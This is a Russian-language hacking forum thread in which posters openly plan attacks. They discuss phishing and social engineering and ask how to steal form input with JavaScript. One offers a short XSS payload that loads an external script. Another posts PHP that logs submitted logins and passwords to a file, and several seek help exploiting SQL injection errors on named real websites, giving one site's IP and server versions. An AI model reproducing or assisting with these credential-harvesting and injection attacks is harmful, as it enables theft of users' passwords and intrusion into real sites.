Ваши вопросы по уязвимостям.

Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки

 

А не подскажете хороший бесплатный хостинг с поддержкой php и доменом .ru?

 

Хотя поди палевно будет т.к будет ругаться антивирусник.А можно ли при помощи js красть введенные данные из форм?

 

подскажите,возможно ли обойти ограничение в 40 символов,в поле восстановления пароля? Правка Html ничего не даёт(хотя раньше пролазило(()

 

руками запрос формировать пробовали для отправки?
просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.

 

только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))

 

<script/src=http://google.com></script> - эта конструкция ровно 40 символов

 

там SQl inj

 

POST запрос отправляемый имеете ввиду пробовали подправлять?

 

Да

 

Тогда точно на стороне сервера фильтр, больше и не отправите

 

----------------------------------------------------------------------------------------------------------------------
как именно нужно прописать этот php?
примерно так?)))
<?php

$BASE = "base.txt";

$fd = fopen($BASE,"a+");

$p0=$_POST['login']

$p1=$_POST['password']

$info="$p0:$p1:\n";

fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

fwrite($fd,$info);

fclose($fd);

 

"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.

 

Так дело в том что ничего не меняется))) Уже все перепробовал)

 

Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.

 

http://www.toramp.com/schedule.php?id=505' - появляются караракули .
И ничего более .
Единственное что узнал .
Host IP: 109.120.169.82
Web Server: nginx/0.7.67
Powered-by: PHP/5.3.3-7+squeeze14

 

Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок

 

Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .

 

Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43
Query invбlido: select explica from linea_explica where linea = ''''

С этим ничего как я понял нельзя сделать?